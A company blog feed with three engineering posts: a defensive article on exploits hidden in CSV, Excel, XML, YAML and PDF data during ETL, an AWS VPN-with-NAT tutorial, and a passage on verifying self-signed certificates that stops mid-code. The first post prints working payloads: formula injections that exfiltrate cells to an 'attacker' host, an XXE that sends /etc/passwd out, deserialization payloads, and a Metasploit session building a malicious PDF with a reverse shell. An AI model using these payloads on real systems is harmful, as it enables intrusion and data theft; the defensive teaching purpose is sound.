DEV Community: Smarking

Beware of Exploits in ETL

Smarking — Tue, 27 Apr 2021 18:17:00 +0000

Exploits in Data Files

At Smarking we receive data from third-party vendors. This data comes in various formats: XML, CSV, Excel, PDF, and JSON, and we use an Extract-Transform-Load (ETL) process to store the data in our database. This kind of ETL process is used by many organizations that ingest data from external sources. What are the security considerations pertaining to this process?

The security issue is that a third party may unintentionally provide data laden with exploits. This can happen if the third party accumulates but does not filter free-form data submitted by users. Such data may include names, street addresses or free-form descriptions. The exploits would be innocuous at rest but would weaponize once data is extracted for manual viewing.

For instance, if a cell in a CSV file starts with an equal sign = then Excel would interpret the cell as a formula to be executed. For instance, consider this CSV:

Date,First Name,Last Name
2020-07-25,John,Smith
2020-07-25,Marry,Poppins
2020-07-25,"=2+5", Math

Unfortunately, quotes around the cell value do not help to neutralize this effect. Both the Apple Numbers and Microsoft Excel apps would render the rogue cell as "7," despite the quoted "=2+5". In addition, the following characters can trigger formula evaluation: +, -, @. The rendered table would look like this:

Date	First Name	Last Name
2020-07-25	John	Smith
2020-07-25	Marry	Poppins
2020-07-25	7	Math

The formulas also allow running external commands in the underlying operating system. For example, each of these CSV lines would trigger opening an external calculator program calc.exe,

...,=DDE("cmd";"/C calc";"__DdeLink_60_870516294"),...
...,=cmd|' /C calc'!A0,...
...,"=2+5+cmd|' /C calc'!A0",...
...,@SUM(cmd|'/c calc' !A0),...

There would be warnings from Excel before running external commands, but attackers rely on users' tendency to ignore security warnings in files downloaded from trusted sources.

Special functions that create hyperlinks allow attackers to steal data from a CSV file. If a CSV file contains the following value in a cell, then upon opening it in Excel a user would see a link with the text "Error: please click for further information" in the corresponding cell inside the app. Upon clicking the link, he would submit the contents of cells A10 and A11 to the attacker. Those cells may contain sensitive information, such as payment details.

...,=HYPERLINK("http://attacker?leak="&A10&A11,"Error: please click for further information"),...

Neither Google Sheets web app is immune from such attacks. For instance, the IMPORTXML(url, xpath) function (documentation here ) would fetch data from the provided URL and insert it into the current sheet. Consider what would happen when importing the following CSV into Google Docs,

...,"=IMPORTXML(CONCAT(""http://attacker?v="", CONCATENATE(A2:E2)), ""//a"")",...

The result would be that data in the 2nd row of the spreadsheet spanning cells A2 through E2 would be submitted to the attacker.

But it gets worse. The URL could also be another spreadsheet in your account. By using this technique twice the attacker can exfiltrate data from any other spreadsheet in your Google Docs account if he knows its URL.

A suggested workaround for these attacks is to prefix each of the special characters =,+,-,@ in the CSV with a tab character. This neutralizes the attacks when viewing the data in Excel and other spreadsheet apps, however, note that the data is no longer in its original form.

Also, PDF files are widely used to export reports from administrative websites. If you use libraries like tabula-py to extract CSVs from such PDFs, then the extracted data can have exploits mentioned earlier.

Full control of data file generation

So far we have looked at the situation in which data contains latent exploits in a regular data file. However, if an attacker can manufacture a data file in full, then he can do far more damage. The challenge for him, however, is to deliver such a file to the victim.

If you receive data files from third parties, then a failure to authenticate the sender makes you subject to fishing attacks. If you are receiving data files by email, you may be getting them from an impostor. If you are receiving files by submission to your API, ensure that the third party is using an authentication token. If you are downloading data from a third party, verify its SSL certificate even if the third party is using a self-signed one. (On tips on how to do that read our earlier Smarking blog post.)

The attacker can also gain control of the data file generation code. This can be accomplished by poisoning public code repositories. The simplest of such attacks is publishing a misspelled variants of popular packages hoping that users would install them by accident. For instance, In 2018 a researcher found a malicious package 'dajngo' in the Python's PyPi repository which is an intentional misspelling of the popular package 'django.'

By infecting generated data files rather than the system hosting malicious code the attacker delays detection. A malicious data file can introduce a discrepancy into ETL which may be manually reviewed only weeks later. The malicious data file would be downloaded and opened by the victim, thereby infecting his system. Thus, API exploits can infect hundreds if not thousands of API consumers until the issue is identified at the API source. Each infection could open a reverse tunnel to the attacker creating a pivot for further network infiltration.

Excel files

Much like CSV files, Excel files are subject to formula-based exploits. But in addition to that, attackers can do more tricks with an Excel file. A single Excel file can encode multiple worksheets some of which may be hidden. Excel files can also specify font size and font color for particular cells and this feature can be used to hide values by using a white font. The cells have a specific data type associated with them.

Starting from version 4.0 of Excel has support for new kinds of macros. While standard formulas are limited to workbook-related calculations, the new XL4 macros allow extensive, Turing-complete, programming. In order to work, they must reside on a macro-enabled sheet.

There are other behaviour differences between a CSV and an Excel file. An Excel file would automatically open in the Excel app when double-clicked, but CSV files would open in the default spreadsheet app on the user's system (The "Numbers" app on a Mac). Excel files may also be from an older version of Excel in which case the installed Excel app would attempt to import them. This variety of behaviors creates a larger attack surface for Excel data files than for CSV files.

Security at VMware surveyed XL4 exploits in the wild and presented a report in November of 2020. They demonstrate how the macros can be used to download files from the internet, to execute PowerShell scripts, and change the Windows registry.

The XL4 macro sequence begins to run from a cell immediately under a cell labeled Auto_Open and descends lower and lower until there are no more cells with commands. A =GOTO statement can direct the program flow to any cell. Combined with FORMULA.FILL which can write any value into a cell (including an = command), the GOTO can be directed to jump to a dynamic location. This allows you to implement flow control such as loops and if statements, making the attacker's script Turing complete.

The attackers can obfuscate their code so that it does not look like a program. The GOTO jumping function can be used to obfuscate code by scattering it all over the spreadsheet, including cells not in view. White font can make the cells appear blank. Dynamic code can be generated at run-time by deobfuscating data in cells and converting them into code. Code can also be downloaded from the Internet at runtime, then pasted into a temporary cell and executed.

As stated earlier, in order for the XL4 macros to work they must reside on a macro-enabled sheet. Security measures are already in place to alert about the presence of such sheets. However, an attacker can prepare an Excel file without the macro designation, and try to trick the user to manually enable it. For instance, this kind of Excel document was observed in the wild:

XML, JSON and YAML

XML files can be exploited using Processing Instructions (PI). These are instructions like <!DOCTYPE html> which can cause XML parsers to load files from the file system and to generate HTTP requests. For instance, the following XML file instructs to load a local file and insert it into its own body:

<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>

If the attacker could trigger an error that is reported back to him by the XML parser, then the contents of the file might be included in the error message thereby leaking data to the attacker. Modifying the URL to http://example.com/foo.xml protocol would load a remote file from the Internet.

Using these techniques an attacker could steal data or perform a Server-side Request Forgery (SSRF) attack to bypass firewalls. The following XML and DTD combination sends the contents of /etc/passwd file to the attacker:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
 %dtd;
]>
<root>&send;</root>

where evil.dtd file is:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>">
%all;

The attacker can also cause a Denial of Service attack by loading a large file:

<?xml version="1.0"?>
<!DOCTYPE root [
 <!ENTITY file SYSTEM "http://attacker/huge.xml" >
]>
<root>&file;</root>

Entity expansions can be used to occupy gigabytes of memory using a short XML document. The following scheme would expand to occupy an exponentially large amount of memory relative to the number of lines used,

<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>

Many XML processing libraries can parse gzip compressed streams. Some of these libraries are also vulnerable to compression bombs (1GB of zeros can be compressed to a 1MB data stream).

In addition, XML parses have vulnerabilities that are triggered by malformed XML documents. For instance, a large amount of unclosed nested tags XML tags as shown below would exhaust the computer's resources.

<A1>
 <A2>
  <A3>
   ...
    <A30000>

Unfortunately XML libraries across various languages do not handle such attacks. The Python lxml library would dutifully load a local file from the filesystem and the xmlrpc library would be subject to the memory blowup attack. However, there are specialized libraries such as DefusedXML that correctly handle such attacks. Use these libraries when working with untrusted data.

If you are writing an XML parser yourself, use the following guidelines to limit the attack surface: limit parse depth, limit parse time, skip DTDs, and do not expand entities. Also, do not run XPath expressions from untrusted sources and do not apply XLS transformations received from untrusted sources.

Many API interfaces expect and return data in JSON or XML formats which contain records as key-value maps. The records are then stored in a database that many records. Whenever the records are exported from the database into a CSV report for analysis, the resulting files would lead to attacks that we have already seen.

Rogue content can get into JSON and XML through an injection attack. This attack is similar to the familiar SQL injection but it operates on JSON and XML. The following would be an unsafe way to build a JSON document containing a password:

json = `{..., "password":"${password}"}`

That is because a password can have quotes, commas, and colons inside it, arranged to generate new keys in the resulting JSON. Instead, use a library that would properly escape values.

Many languages have libraries to save or serialize objects in JSON, XML, and Yaml files and then to restore them later in a process called "deserialization." By design, this means that data files would embed names of objects' types and objects' states. Thus, if an attacker could cause deserialization of rogue data, then he would gain remote code execution. For instance, loading the following YAML file with Python's yaml.load(filename) would create a new object of type Foo with name parameter "bar."

!!python/object:__main__.Foo {name: Bar}

Python's Yaml library is one of many data loaders which has a secondary ability to deserialize objects. A study in 2017 [Bechler] cataloged dozens of Java libraries vulnerable to such deserialization attacks. The study reported that if the following file is parsed by Java's XMLDecoder decoder, then it would create the attacker's specified object and call a method on it. In the following example, it would run an external command /usr/bin/gedit using method start of the ProcessBuilder object which would first be created.

<new class="java.lang.ProcessBuilder">
  <string >/usr/bin/gedit </string> <method name="start" />
</new >

Also, the same study showed that a vulnerablity in Apache Camel's SnakeYAML library (CVE-2017-3159) allowed an attacker to run arbitrary scripts inside Java's ScriptEngine object:

!! javax . script . ScriptEngineManager [
  !! java . net . URLClassLoader [[
    !! java . net . URL [" http :// attacker /"]
  ]]
]

PDF Files

Much like MS Office files, PDF files are notorious delivery vehicles for exploits. For instance, last September a use-after-free bug was discovered in a cache data structure used by Adobe Reader. It lead to a code execution exploit CVE-2020-9715.

PDF files have a large attack surface. They contain JavaScript in order to power PDF-based forms. Also, the PDF standard allows embedding arbitrary file attachments, making a PDF document equivalent to an uncompressed "zip" file. Using such attachments the attacker can easily embed exploit payloads inside the PDF and then extract them using a small amount of embedded JavaScript. For instance, the CVE-2018-8414 exploit used this technique to embed XML files into a PDF.

It is simple to add embed files inside a PDF. The following command appends an attachment data.bin containing raw binary data to page 27 of a PDF document,

$ pdftk manual.pdf attach_files data.bin to_page 27 output manual_plus.pdf

For security reasons, modern PDF readers do not automatically execute embedded JavaScript scripts. But in 2010 a security researcher Didier Stevens found that it is possible launch an external program with /Launch /Action command sequence to gain code execution in the host operating system. Acrobat Reader showed a warning but Didier found a way to alter the message text in order to trick users to ignore it.

You can replicate Didier's technique using Metasploit, a security researcher's tool which attackers also use. Didier's technique was implemented as Metasploit module adobe_pdf_embedded_exe_nojs, whose documentation states:

This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. [It] does not require JavaScript to be enabled and ... [the] EXE is embedded in the PDF in a non-standard method using HEX encoding. Target: Adobe Reader <= v9.3.3 (Windows XP SP3 English)

Although this particular exploit is non-viable for current versions of PDF readers, the approach can be reused in future exploits. In addition, Metasploit has other PDF exploits:

> search type:exploit platform:windows name:pdf
... exploit/windows/fileformat/foxit_reader_uaf   ...   2018-04-20

A possible defense from PDF exploits is to preprocess all untrusted PDF files and strip everything but the static content inside the PDF. This can be accomplished with the following GhostScript command:

$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf original.pdf

Note that any copyable text inside the PDF would not be by made uncopyable. A discussion on StackOverflow suggests adding options to downsample any embedded images to remove exploits that utilize flaws in image processing libraries.

A simple text search inside the PDF file would not find all suspicious active components because attackers obfuscate them. Instead, one can use Didier's tool pdfid to triage PDF documents and to analyze the suspicious ones with his pdf-parser tool.

The following example shows how to generate a malicious PDF and then neutralize it:

$ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set lhost 1.2.3.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set filename malicious.pdf
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > exploit
...
$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf malicious.pdf
$ python pdfid.py malicious.pdf > malicious.txt
$ python pdfid.py clean.pdf > clean.txt
$ diff --width 80 --side-by-side malicious.txt clean.txt
PDFiD 0.2.7 malicious.pdf             | PDFiD 0.2.7 clean.pdf
 PDF Header: %PDF-1.5                 |  PDF Header: %PDF-1.7
 obj                    5             |  obj                    7
 endobj                 5             |  endobj                 7
 stream                 0             |  stream                 2
 endstream              0             |  endstream              1
 xref                   1                xref                   1
 trailer                1                trailer                1
 startxref              1                startxref              1
 /Page                  1(1)          |  /Page                  1
 /Encrypt               0                /Encrypt               0
 /ObjStm                0                /ObjStm                0
 /JS                    0                /JS                    0
 /JavaScript            0                /JavaScript            0
 /AA                    0                /AA                    0
 /OpenAction            1(1)          |  /OpenAction            0
 /AcroForm              0                /AcroForm              0
 /JBIG2Decode           0                /JBIG2Decode           0
 /RichMedia             0                /RichMedia             0
 /Launch                1(1)          |  /Launch                0
 /EmbeddedFile          0                /EmbeddedFile          0
 /XFA                   0                /XFA                   0
 /Colors > 2^24         0                /Colors > 2^24         0

Final Thoughts

We have seen that the attack surface of data processing libraries differs from the attack surface of data viewing applications. There is a fundamental difference between data for machines and data for people. We have also seen that if the attacker can fully control the data file creation, then he can cause much more damage.

When working with data received from a third party it is not known how well the third party checks data submitted by its users. The first step to protect yourself from exploits is to drop superfluous elements from a third party's data during the transformation stage of the ETL process. For instance, if fields titled "Description" and "Street Address" are not needed, then they can be filtered out on import.

Filter out unnecessary characters from fields. A street address does not need to have =, +, @ characters, and most data values never need to begin with those characters. When exporting data from your own database into CSV and PDF reports for manual viewing, simplify the data by removing all unusual characters since the report need not have data in the precise original form.

Anonymize datasets to remove Personal Identifiable Information (PII). This further reduces the attack surface because any user-submitted values are replaced by anonymized equivalents.

Finally, use Virtual Machines when opening unsafe files. Virtual Box or remote instances on Amazon AWS can be used for working with unsafe data files. As of 2021, AWS supports both Windows and Mac OS virtual workstations. Running ETL jobs in Docker also helps prevent any exploits from escaping into the underlying operating system.

At Smarking, we injest millions of records from parking vendors and we use such techniques to fend off exploits.

Additional Reading

[Mauer] "The Absurdly Underestimated Dangers of CSV Injection," George Mauer, 2017 (link)
OWASP "XML Security Cheat Sheet" (link)
[Bechler] "Java Unmarshaller Security: Turning your data into code execution", Moritz Bechler, 2017

AWS Site-to-Site VPN with NAT

Smarking — Fri, 22 Jan 2021 05:18:28 +0000

At Smarking, we use the Amazon Web Services (AWS) infrastructure. We help organizations improve the efficiency of parking lots, and to do that we need to communicate with their computing systems. However, these organizations, which include hospitals and universities, often run closed private networks. Outside vendors like us may access those networks only through an IPSec-based VPN.

Is it possible to create an IPsec tunnel from an AWS Virtual Private Cloud (VPC) to a network outside of AWS? The use case that AWS supports well is connecting your own on-premises network with the VPC. Thus, in naming components, AWS uses the term "Customer Network" to designate your on-premises network. You are the customer of AWS.

Also, because you are the administrator of your on-premises network, AWS does not expose extensive logs that would allow you to troubleshoot the establishment of the IPSec tunnel. Instead, AWS assumes that you would be able to inspect the logs on the side of the on-premises network.

But what if you wished to create an IPSec tunnel from your VPC to a third party network, one which is beyond your administrative control? In particular, you may not control the CIDR policy of the third party network. A third party may require that you place your network on a specific CIDR, or that you use publicly addressable IP addresses.

In order to support creating IPSec tunnels, AWS offered, for many years, a specialized solution called a Virtual Private Network (VPN). In recent years, it supplemented it with a generic solution called a Transit Gateway (TGW). The VPN solution requires that the customer's network doesn't conflict with your CIDR. Unless you are willing to change the IP addresses inside your VPC to match the requirement, then you need to use Network Address Translation (NAT). This can be accomplished by creative use of the Transit Gateway (TGW).

Below is the network layout that illustrates the key idea. Assume that the AWS VPC has the subnet 20.0.0.0/16, the customer's network is on the 172.31.0.0/16 subnet, and that the customer wants us to use a public IP subnet. (We use AWS' terminology of "customer" to refer to a third party.) But, instead of using a public IP subnet, we will use NAT to map all EC2 instances to the single Elastic public IP 1.2.3.4.

Inside our VPC we create a subnet 20.0.6.0/24 whose sole purpose is to contain a NAT gateway EC2 instance ("NAT GW" in the diagram) that would perform the NAT operation. Note that AWS has a built-in component called "NAT gateway," but here we run our own EC2 instance that performs this function using Linux and iptables packet filter.

The rest of the EC2 instances in our VPC live in separate subnets. The routing tables in those subnets forward packets that are destined to the customer's side to the Elastic Network Interface (ENI) of the NAT gateway instance.

The subnet in which the NAT gateway lives has a routing table that forwards packets that are destined for the customer to the Transit Gateway. However, by this time, the source address of these packets is the public IP 1.2.3.4 because these packets have been now NAT-translated. Unlike the more basic Virtual Private Network AWS component, the Transit Gateway AWS component does not place any restrictions on the source address of the packet.

The Transit Gateway has a routing table that tells it where to send the packets further. Packets destined to the customer's side are forwarded to the "Site-to-Site VPN" AWS component. This is the component that has all the IPsec tunnel options. In particular, it lists the end-point IPs on the AWS side and the customer's side. Note that AWS allows only to specify the end-point IP on the customer side and automatically picks a public IP on its side. (We have no control of this IP address.)

If the Site-to-Site VPN component can establish the IPsec connection, then upon receiving the packets from the Transit Gateway, it would forward them through the tunnel. The customer would see 1.2.3.4 as the source IP of the packets and his routing table would instruct to send packets destined to the 1.2.3.4 IP back into the tunnel.

Returning Packets

So far we have discussed how the packets originating at a test EC2 instance in our VPC make their way to the customer's side. Now let's see the process in the opposite direction. Once the Site-to-Site VPN connection receives a packet destined for 1.2.3.4 IP address, it forwards it to the Transit Gateway (TGW). The routing table of the TGW tells to forward such packets to the particular subnet inside the VPC where the NAT GW instance runs.

Once the packet arrives in that subnet, a specific entry in the subnet's routing table tells the subnet's router to forward the packet to the Elastic Network Interface (ENI) of the NAT gateway instance. The NAT instance picks up the packet and de-NATs its destination back into the 20.0.0.0/16 network address space. Then, it dispatches the modified packet and AWS forwards it to the test EC2 instance.

Configuration of the Linux NAT instance

In order to make the NAT gateway instance to pick up packets that do not have its IP address in their destination header, AWS must be told to disable the "source/destination check." This can be done in AWS Console EC2 “Instances” view like this: right-click on the instance to bring a popup menu, then select “Networking” → “Change source destination check” and disable the check.

Also, we must tell Linux to pick up the packets with this command:



$ echo 1 > /proc/sys/net/ipv4/ip_forward

Assuming that the local IP address of the NAT instance is 20.0.6.195, these iptables commands set up the NAT operation,



$ iptables -t nat -F
$ iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4
$ iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination 20.0.6.195

To handle additional customer networks we may add more SNAT lines. For example, for a customer network with CIDR 192.168.0.0/16 we would add this rule,



$ iptables -t nat -A POSTROUTING -d 192.168.0.0/16   -j SNAT --to-source 1.2.3.4

If there was another customer who wanted to see our instances coming from a different address space, then we would also add additional DNAT lines. For example, if a customer on network 10.0.0.0/16 wanted our traffic to appear as if it's coming from 10.1.0.0/16, then we could: (a) SNAT all outgoing packets to an IP address on that CIDR, for instance 10.1.0.1, and (b) DNAT them back to 20.0.6.195 upon return.



$ iptables -t nat -A POSTROUTING -d 10.0.0.0/16   -j SNAT --to-source 10.1.0.1
$ iptables -t nat -A PREROUTING  -d 10.1.0.1 -j DNAT --to-destination 20.0.6.195

(In addition to updating the NAT rules, we would also need to update the AWS infrastructure as specified by the diagram: to add entries to subnet routing tables and to create additional Site-to-Site VPN connections and associate them with the Transit Gateway.)

Testing

We can test our setup by simulating a Customer network using an AWS tutorial to create a StrongSwan Linux VPN. We create another VPC to represent the "Customer's" side and set it's subnet to 172.31.0.0/16 CIDR. Then we follow the tutorial to create a StrongSwan Linux instance in it. We create another test EC2 instance in the same VPC and configure the routing table of the VPC to forward packets with destination 20.0.0.0/16 to the Elastic Network Interface (ENI) of the StrongSwan instance. Also, we assign a public IP to the StongSwan instance.

Returning back to our main VPC, we create a Site-to-Site VPN connection and set the public IP of the StrongSwan instance as the destination. We put the rest of the configuration as advised by the tutorial, and wait until the first tunnel shows that it is in the UP state.

The tutorial advises using Border Gateway Protocol (BGP) when creating a Site-to-Site VPN connection. Once the tunnel is set up, the StrongSwan instance would be automatically configured with 20.0.0.0/16 subnet thanks to the BGP. However, our packets will be arriving with 1.2.3.4 as the source address, so the BPG routing table would not know where to send the returning packets. To fix this, we connect to the StrongSwan instance and edit the configuration file /etc/quagga/zebra.conf for BPG daemon Zebra, to add a static route:



ip route 1.2.3.4/32 169.254.152.245

Then, we restart the BGP daemon with the service zebra restart command. Note that the IP address 169.254.152.245 in the above configuration line is the "Inside IP Address" of the Virtual Private Gateway of one of the two IPsec tunnels that the Site-to-Site VPN Connection created. You will have a different address, which you can look up from the Generic Configuration text file that can be downloaded from the Site-to-Site VPN Connection screen of the AWS console.

Next, we connect to the test EC2 instance in the 20.0.5.0/16 subnet and ping the test instance in the customer's 172.31.0.0/16 subnet,



[ec2-user@ip-20-0-5-210 ~]$ ping 172.31.38.197  > /dev/null & sudo tcpdump -eni any icmp
15:49:14.787108 Out ... 20.0.5.210 > 172.31.38.197: ICMP echo request, ...
15:49:14.854690  In ... 172.31.38.197 > 20.0.5.210: ICMP echo reply ...

We can also observe the traffic flowing through the NAT gateway instance:



ec2-user@ip-20-0-6-20:~$ sudo tcpdump -eni any icmp
20:39:46.084613  In … 172.31.38.197 > 1.2.3.4: ICMP echo request, id 26627, seq 1 ...
20:39:46.084657 Out … 1.2.3.4 > 172.31.38.197: ICMP echo reply, id 26627, seq 1 ...

The following helpful AWS CLI commands output all configurations for all Site-to-Site VPN connections. They include all tunnel parameters, particularly the secret Preshared Keys (PSKs).



$ aws ec2 describe-vpn-connections
$ aws ec2 describe-transit-gateways
$ aws ec2 describe-transit-gateway-attachments

Troubleshooting the IPSec tunnel

Unfortunately, AWS still has not created a way to debug the actual IPSec tunnel establishment. That is because AWS has not exposed any logs of this stage. The use-case that AWS aims to solve is connecting one's own on-premises network with your own AWS VPC in the cloud. In such case, we could debug the on-premises side of the IPsec connection. However, if the customer is a third party and the IPSec connect is failing, we are left at the mercy of the third party to debug the issue.

Terraform Configuration of the Transit Gateway

The following Terraform commands set up the Transit Gateway and help illustrate all of the settings further. For brevity, name tags and some other sections have been omitted.

First we define the Transit Gateway and disable all the default routes.



resource "aws_ec2_transit_gateway" "example_transit_gateway" {
  amazon_side_asn = 64512
  auto_accept_shared_attachments = "disable"
  default_route_table_association = "disable"
  default_route_table_propagation = "disable"
  description = "Example Transit Gateway."
  vpn_ecmp_support = "disable"
}

Since we told AWS to not create a default route table for the TGW, we must create it by hand like this:



resource "aws_ec2_transit_gateway_route_table" "example_transit_gateway" {
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
}

The Transit Gateway has a split configuration of "routes" and "attachments." The routes specify an attachment as the destination. We first create the attachment to the VPC subnet in which the NAT gateway EC2 instance lives (here named as private_subnet6 ),



resource "aws_ec2_transit_gateway_vpc_attachment" "nat_vpc_attachment" {
  vpc_id             = module.vpc.id
  subnet_ids         = [ aws_subnet.private_subnet6.id ]
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
  transit_gateway_default_route_table_association = false
  transit_gateway_default_route_table_propagation = false
}

Next, we add the route that tells the TGW to forward packets destined to 1.2.3.4 to the VPC subnet which we have just attached:



resource "aws_ec2_transit_gateway_route" "nat-egress-ip" {
  destination_cidr_block = "1.2.3.4/32"
  transit_gateway_attachment_id  = aws_ec2_transit_gateway_vpc_attachment.nat_vpc_attachment.id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}

So far we have handled the returning of the packets. Now, let's handle the forward direction. First we define the Customer Gateway and the Site-to-Site VPN connection and then tell TGW to forward packets to it.



resource "aws_customer_gateway" "example_customer" {

  bgp_asn    = 64520

  ip_address = '6.7.8.9' # this would be the public IP of the StrongSwan instance during test

  type       = "ipsec.1"

}

resource "aws_vpn_connection" "example_customer" {

  customer_gateway_id = aws_customer_gateway.example_customer.id

  transit_gateway_id  = aws_ec2_transit_gateway.example_transit_gateway.id

  type                = aws_customer_gateway.example_customer.type

  static_routes_only  = false

}

resource "aws_ec2_transit_gateway_route_table_association" "example_customer" {

  count=length(local.vpn_attachments)

  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id

  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id

}

resource "aws_ec2_transit_gateway_route" "example_customer" {

  count=length(local.vpn_attachments)

  destination_cidr_block         = "172.31.0.0/16"

  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id

  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.account_transit_gateway.id

}

Terraform configuration of the custom NAT Gateway instance

The challenge in automatically configuring the NAT gateway EC2 instance is (a) to assign an Elastic public IP, and (b) to use the assigned private IP in the iptables rules. The solution is to first define an Elastic Network Interface (ENI) and then to use it in the definition of the instance:



resource "aws_network_interface" "nat_gw" {

  source_dest_check = false # must be disabled for NAT to work

  subnet_id = module.vpc.sn-private-nat-az1

  security_groups = [ ... ]

}

resource "aws_eip_association" "nat_gw" {

  network_interface_id = aws_network_interface.nat_gw.id

  allocation_id = "1.2.3.4"

}

resource "aws_instance" "nat_gw" {

  network_interface {

    device_index = 0

    network_interface_id = aws_network_interface.nat_gw.id

  }

... 

user_data = <<EOF

  
  
  !/bin/bash


echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -F

iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4

iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination ${aws_network_interface.nat_gw.private_ip}

EOF

}

Security Considerations

Because we are using NAT, no instance behind the NAT GW instance can be accessed from the customer's network. However, the NAT gateway itself can be reached from the customer's network. The ports which can be accessed are limited by the AWS Security Group of the subnet in which the NAT gateway lives. For instance, the following inbox Security Group rules would allow the customer's side to only ping the instance and to make HTTPS requests to it:

Type	Protocol	Port Range	Source	Description
HTTPS	TCP	443	172.31.0.0/16	Customer's side
All TCP	TCP	All	20.0.0.0/16	From inside VPC
All ICMP - IPv4	ICMP	All	0.0.0.0/0	To allow pings

Access can be also locked down by restricting the DNAT rule in iptables. Upon restricting it to the icmp protocol as shown below, the remote side would still be able ping the NAT gateway at 1.2.3.4, yet would not be able to HTTPS into it.



iptables -t nat -A PREROUTING  -d 1.2.3.4 -p imcp -j DNAT ...

Final Thoughts

We can get more mileage out of the Transit Gateway than from the older Virtual Private Network (VPN) AWS component. That is because the Transit Gateway is ambivalent about the source CIDR of the packets that it receives.

We hope that if more companies would use the TGW to connect to outside networks using NAT, then AWS would support this use-case directly in the Site-to-Site VPN settings so that there would be no need to maintain an EC2 instance to perform NAT. We also wish that AWS would expose Site-to-Site VPN logging of the IPsec VPN tunnel establishment to help with troubleshooting at that stage.

Verification of Self-Signed Certificates

Smarking — Tue, 05 Jan 2021 18:53:38 +0000

When interfacing to third-party web services, one often has to deal with self-signed SSL certificates that trigger verification errors. One workaround is to suppress those errors. (For instance, the Curl tool has the 'insecure' flag for this purpose.) However, at Smarking, we found ways to verify such certificates and to safeguard data communication from Man-in-the-Middle attacks.

Conventionally a web browser relies on a Public Key Infrastructure (PKI) to verify SSL certificates. Every certificate is signed by another (signing) certificate. That signing certificate must be signed by another, in a chain ending on a trusted certificate. This linkage allows a web server operator to switch to a new SSL certificate without requiring visitors to his website to update their web browsers. Alternatively, he could ask his users to trust his specific certificate so that the browser would not need to walk up the signature chain to verify it.

An SSL certificate carries inside it a public key of the webserver. On a conceptual level, the authenticity of that public key is the thing that allows us to establish an authenticated Diffie-Hellman key exchange between the browser and the server. Thus, if we could verify that it is the correct public key, we would have "verified" the certificate. However, instead of verifying a long public key, we could instead verify its checksum that is usually much shorter. A checksum of the entire certificate is called its fingerprint, and it's always formatted as a colon-separated list of hex codes. For instance, here is the SHA-256 fingerprint of the certificate served by https://google.com:

14:71:16:87:6D:F6:76:8E:98:E5:66:62:70:64:F1:0F:F8:0F:87:39:B8:55:4C:47:26:22:DF:FA:7D:1D:A5:FE

To retrieve the details of a website's certificate, click on the lock icon in your browser's URL bar and then inspecting SSL certificate details. Alternatively, you could use the following shell script:

#!/bin/bash
HOST=example.com
PORT=443
PROXY=1.2.3.4:8888

# If your environment does not require a HTTP proxy, delete the '-proxy $PROXY' parameter below
echo quit | openssl s_client -showcerts -servername $HOST -connect $HOST:$PORT -proxy $PROXY > result.txt

The output file result.txt includes the certificate in PEM format and metadata. The PEM format consists of binary data encoded using Base64 into ASCII, enveloped with "begin" and "end" lines like so:

-----BEGIN CERTIFICATE-----
<certificate encoded in base64 encoding>
-----END CERTIFICATE-----

You may feed the result.txt file into the following command to compute the fingerprint of the certificate. (The openssl tool would use the first certificate it finds in the input file and ignores everything else.)

$ openssl x509 -noout -fingerprint -sha256 -inform pem -in result.txt

The above command uses a -sha256 switch, which determines the length of the fingerprint to be 32 bytes. There are only a few widely-used variants, therefore the length of the fingerprint identifies the algorithm used to derive the fingerprint.

Here are three methods by which you can verify certificates by their fingerprints.

Method #1: Use Python

Verification of certificates by a fingerprint is supported out-of-the-box by the urllib3 library using the assert_fingerpint parameter,

import urllib3
from urllib.parse import urlparse

def http_get_request(url, fingerprint):
  parsed_url = urlparse(url)
  host = parsed_url.netloc
  path = parsed_url.path
  pool = urllib3.HTTPSConnectionPool(host, assert_fingerprint=fingerprint)
  response = pool.urlopen('GET', path)
  return response

response = http_get_request('https://example.com/a/b/c', '14:71:...')
print(response.data)

Notice that the fingerprint option configures an HTTPSConnectionPool object which could then be used to make a series of queries against a website, such that each of the queries would verify the fingerprint of the certificate.

The Python's requests library supports certificate fingerprint verification also because it builds upon the urllib3 library. It is based on adapter objects that return the HTTPSConnectionPool objects discussed above, and it provides a method Session::mount() which allows setting a custom adapter for a particular base URL. Putting this together, we have this code:

from urllib.parse import urlparse

def create_fingerprint_session(url, fingerprint):
  host = urlparse(url).netloc
  s = requests.Session()
  s.verify = False
